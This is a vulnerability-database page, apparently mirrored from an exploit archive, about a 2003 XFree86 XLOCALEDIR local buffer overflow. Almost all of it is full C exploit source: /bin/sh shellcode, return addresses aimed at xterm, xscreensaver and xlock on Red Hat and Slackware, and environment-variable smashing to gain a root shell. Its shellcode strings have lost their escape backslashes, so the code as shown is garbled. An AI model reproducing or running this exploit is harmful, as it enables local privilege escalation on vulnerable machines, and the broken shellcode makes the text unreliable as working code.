XFree86 4.2 – ‘XLOCALEDIR’ Local Buffer Overflow (4)
| 漏洞ID | 1053732 | 漏洞类型 | |
| 发布时间 | 2003-03-03 | 更新时间 | 2003-03-03 |
CVE编号
|
N/A |
CNNVD-ID
|
N/A |
| 漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7002/info
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.
/* XFree86 XLOCALEDIR env local root exploit
coded by [email protected]
PH4NT0M SECURITY TEAM
bug is reported at www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4516
this bug was founded by tarranta & dcryptr 3 january 2003
dcryptr and angello have given exploits
this exploit is base on that two exploits
tested on REDHAT 9
but there isn't a 's' for these two files.so we can't get a rootshell.
just for fun!
*/
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
#include <string.h>
#include <stdio.h>
//#define RET 0xbffffe50 // on rh9 ,RETADDR could be 0xbffff00---0xbffffe90 ===>tha's will be good!
char shellcode[]=
"x31xdb"
"x89xd8"
"xb0x17"
"xcdx80"
"x31xdb"
"x89xd8"
"xb0x17"
"xcdx80"
"x31xdb"
"x89xd8"
"xb0x2e"
"xcdx80"
"x31xc0"
"x50"
"x68x2fx2fx73x68"
"x68x2fx62x69x6e"
"x89xe3"
"x50"
"x53"
"x89xe1"
"x31xd2"
"xb0x0b"
"xcdx80"
"x31xdb"
"x89xd8"
"xb0x01"
"xcdx80";
struct target{
int num;
char *version;
char *dest;
char *name;
unsigned long ret;
int bufsize;
};
struct target exploit[]={
{1,"Redhat linux 9.0 --","/usr/X11R6/bin/xterm","xterm",0xbffffe50,4076},
{2,"Redhat linux 9.0 --","/usr/X11R6/bin/xscreensaver","xscreensaver",0xbffffe50,4076},
//this ret on rh7.3 is supplied by angelo rosiello
{3,"Redhat linux 7.3 --","/usr/X11R6/bin/xscreensaver","xscreensaver",0xbfffdf20,4076},
//these 3 ret on slackware followed is supplied by dcryptr
{4,"Slackware 8.1 --","/usr/X11R6/bin/xscreensaver","xscreensaver",0xbfffe861,6000},
{5,"Slackware 8.1 --","/usr/X11R6/bin/xterm","xterm",0xbfffe86d,6000},
{6,"Slackware 8.1 --","/usr/X11R6/bin/xlock","xlock",0xbfffe86d,6000},
{0,NULL,NULL,NULL,0,0}
};
void usage(char *c);
int main(int argc, char **argv){
char buf[4076];
int i;
int type;
int options;
int size;
unsigned long ret;
//options of the exploit
while((options=getopt(argc,argv,"ht:"))!=-1){
switch(options){
case 'h':
usage(argv[0]);
exit(0);
case 't':
type=atoi(optarg);
if(type>6||type<0){
printf("Wrong Target!nn");
exit(0);
}
if(type==0){
usage(argv[0]);
printf("Please select target num !n");
printf("======================================n");
for(i=0;exploit[i].dest;i++)
fprintf(stderr,"[%d] | %s %s n",exploit[i].num,exploit[i].version,exploit[i].dest);
exit(1);
}
break;
default:
usage(argv[0]);
exit(0);
}
}
size=exploit[type-1].bufsize;
ret=exploit[type-1].ret;
//set the env to buf,first time.
memset(buf,0x41,4072);
memcpy(buf+2076,&ret,0x4); //the value 2076 is knows form angelo roseillo's exploit
setenv("XLOCALEDIR",buf,1);
//buffer now has changed ,set env to buf for the second time!
memset(buf,0x90,size);
memcpy(buf+4000+i,shellcode,strlen(shellcode));
setenv("PH4NT0M",buf,1);
printf("n++++++++++++++++++++++++++++++n");
printf("Xfree86 XLOCALEDIR env local root exploitn");
printf("++++++++++++++++++++++++++++++++nn");
printf("coded by aXis,[email protected]");
printf("PST,www.ph4nt0m.orgnn");
printf("retaddr is at 0x%lx n",ret);
printf("buf is at 0x%lx n",&buf);
if(execl((exploit[type-1].dest),(exploit[type-1].name),0)==-1){
fprintf(stderr,"failed,try another target! -h for helpnn");
exit(-1);
}
return 0;
}
void usage(char *c){
fprintf(stderr,"n===XFree86 XLOCALEDIR env local root exploit====n"
"====coded by aXis===========n"
"[email protected]"
"===PH4NT0M SECURITY TEAM www.ph4nt0m.org===nn"
"usage: %s [-h] [-t <num>]n"
"Options:n"
" -h:t this help.n"
" -t num:t select the target type,try 0 for listnn",c);
}
相关推荐: Nortel Netgear ISDN RH348 and RT328 Denial Of Service Vulnerabilities
Nortel Netgear ISDN RH348 and RT328 Denial Of Service Vulnerabilities 漏洞ID 1104390 漏洞类型 Failure to Handle Exceptional Conditions 发…
正文完
CVE编号
CNNVD-ID